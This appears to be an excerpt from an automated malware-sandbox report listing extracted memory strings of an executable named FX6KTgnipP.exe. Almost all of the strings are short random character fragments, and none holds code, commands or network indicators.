                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sbuilt-in bmp codecbmp*.bmp;*.dib;*.rleimage/bmpbmmemstr_3342d79b-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chrmmemstr_e3862734-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chrmz&memstr_da73b08c-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =;zm2memstr_8307ca75-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vksy0memstr_9be5a297-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '_c?!kmemstr_fdc25d27-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m,tnmemstr_b8165261-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r[t%ememstr_2005148a-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?iendmemstr_d3b95401-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -w8l+r*memstr_e4dd1255-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@"u"memstr_bff7f88e-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3x7{ memstr_26bb23e6-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2q#_!memstr_f6ea50c8-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +t,x#memstr_a80d06ab-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $.!m)memstr_57953bd8-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0( j'memstr_b6c45907-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !q59-r)9 @%q+memstr_ee9d0555-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *>%j "'w"memstr_d52fbe99-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6f&m$memstr_848025f3-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4v6x+memstr_73a11962-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #0)n(#memstr_ce846eb5-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +#&e"memstr_1fa745ac-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8v'd0memstr_4014bc36-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3/*046,memstr_e5828144-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !i%|"@,i',2memstr_43c5408c-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3(4h-v$memstr_3510fd05-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !9.q$memstr_18507933-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6v2~ %0x.memstr_2a94e7c7-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 19"s"memstr_7d02671a-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *_ @1memstr_77227cce-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &\ l&8+memstr_c1b27234-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )>!,$e+7$memstr_2f633743-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &e(a0memstr_066005eb-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &o&~1memstr_6ba1e373-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '17)&b%(80,memstr_418de830-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "a'b 90memstr_5e3198f0-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i+l7u5p4-6memstr_f1da26bd-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,=/**j%o/memstr_5e354a46-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g,?&'!memstr_1f5b7864-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -.8z,memstr_093a5e42-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'b)9%i*memstr_3592f194-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +s$g4x-memstr_0f02acc1-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2{7!%memstr_bda48b27-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #"2r+q6u3memstr_1c7211c3-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $#/]*}373memstr_b6bba914-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,7 `'memstr_f82fffa8-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4m$j$memstr_3057e117-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '42r'memstr_a453c83e-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "'/:)memstr_6e34b853-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (<'v(memstr_28e98795-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &@(]4memstr_4db740cc-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !p4|#g$memstr_04c8f3c8-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_5w*00memstr_07ec3c59-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0g"[&memstr_815372e8-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +.-*$memstr_221e75b0-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )j&l)24t#memstr_ca82776a-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 11!h(memstr_52a70e9d-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2[#.,memstr_499e9f51-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &5#[*memstr_a6506c54-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #z {5memstr_93851af8-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %q-g7memstr_358df759-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )o,^ : memstr_69791843-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;%o-<memstr_4e3d01a4-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -^'h+memstr_1639b1ff-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3k6y.memstr_da9aa81d-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "1+ 6memstr_0a529c3d-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *w#o6memstr_d8c16e33-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -x$""k/f-@+memstr_9c075b98-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /d/%-memstr_d4018c57-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x6("memstr_76172206-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %s$l#bmemstr_8a794e27-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9u-memstr_4e975d94-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ? y#-"memstr_f9f96fdb-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !?,b0memstr_ea70af27-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *b(q(memstr_13affa3b-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (48u'memstr_f21b55c0-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %q.o3l#@$memstr_33993d70-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &p6.6memstr_0bf8d31b-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'f*i7memstr_e1e42f16-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =#~2x/memstr_c887ff47-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l!j*k(}1memstr_38bf4dec-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (?1v &,r#@memstr_177ab791-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0p&`+memstr_8faa96c4-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4e%c/memstr_6f7ee4ba-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !57w1memstr_48ff38b0-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &k"e0memstr_fd0382bb-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $l.z.memstr_914ba320-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8w!-#memstr_edca86e6-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0n4p088b1memstr_06801dab-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %9)-,memstr_b75070a1-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'f3c.memstr_9e25ebbe-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *q9|,memstr_14a396a2-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -=4;.memstr_1ce46c02-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +l1t [ memstr_91c55106-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4=%f4n-memstr_ba72f7e8-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@*f5memstr_c644aa39-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (g1}5memstr_2dd00bbc-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &m&[0z2memstr_4862c9a7-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3l$y35'memstr_8a5b5d38-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '10r$memstr_ac757097-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6g"r0-5memstr_80792494-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #b48%memstr_cb2da97d-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (s%c memstr_f6dbab00-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0&&e2memstr_7b23d335-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ."w&ymemstr_8d52c1ee-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0i"f7e1(#}#a0memstr_4571694f-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .s)8rmemstr_7c9b5c88-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !$%b$memstr_0a20b9f0-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,j7^/memstr_2eb750c0-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 88 e!memstr_58123565-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )}(/)memstr_8ba6f96d-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %<4] memstr_fe505dec-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &0-m'memstr_96ae93ee-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /y("+memstr_5a60faf1-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +r$*1memstr_beb6e797-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .h,~'!/memstr_8b411a77-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %i(n9memstr_f5e519d4-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #c-6#memstr_c048f169-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 't5|'memstr_c0bc244d-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (q y(memstr_72cd364b-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $i)p.memstr_6559bc28-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !r&e#p%)'memstr_87ab70af-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +:3c%o0memstr_767d6dde-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (d&`(memstr_ee4512d7-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %09_"memstr_23eb520d-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7o${2./memstr_e2471d7a-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4'23+memstr_ec502577-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "y,d*memstr_1ce5c1ea-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .b2%2memstr_5710ff81-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'x$i3d4t7memstr_88ae0c7c-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (r(w!memstr_fe44e3e9-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %5i5wmemstr_cd246587-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "#2j3memstr_77e790d1-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #q3a7memstr_24e60144-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /l3;'memstr_dcab67ba-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #()a'memstr_8f5dbd28-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %o"5(mmemstr_55afd9ba-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'b*f+]memstr_75cac23a-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *t*j*memstr_d1ac5afd-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "y2v6memstr_2f14b85f-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,i$,3memstr_cbc9ffc0-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %s/))memstr_abc12b1e-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *e+l2memstr_bc6c6eb4-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 36/k!memstr_2afa317d-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6}'x(memstr_1cecfdde-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y+!*memstr_b1989f8d-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -k)/ o)memstr_8bd47ec2-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 16%k%memstr_7c3881e5-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $q$o(memstr_20c61d84-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8h"4f0b"memstr_fc5002de-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #d!m/memstr_dc05b4c9-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "- u$memstr_c7cb3c4c-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &z'f'memstr_2f8a1b70-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +h*u+memstr_39eff293-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #~!y5memstr_73b1a544-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )85c6'7/+%(memstr_429d6d0a-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "i/`)memstr_2eeaaf84-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2w*a,memstr_a66a3440-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .)5_1n7memstr_e6bc8653-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &g/w5memstr_b214ca60-d
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %c2p.memstr_96736344-2
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .c)0(memstr_90c386fc-1
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: *q*j,memstr_959a8e0b-a
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: )2s5h7memstr_49a103d7-3
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ','u#memstr_34911814-1
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 7n$9+memstr_c7b6b997-1
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #e-r2memstr_b0ef4888-6
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 0p&[4memstr_e22ac26d-7
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ,l0/$memstr_529c69a1-a
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: &^(g&memstr_b731940f-4
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .*'50memstr_d8e729b4-4
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: /y7h8memstr_3e6d2a70-5
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: o-t3l1%3memstr_01eaa677-e
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: &3!}9h2s(memstr_92710fbf-2
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $1) memstr_778f69d3-b
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 'k((+]"<5x&memstr_ac459947-e
Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: *:6s-memstr_ed4f0291-5
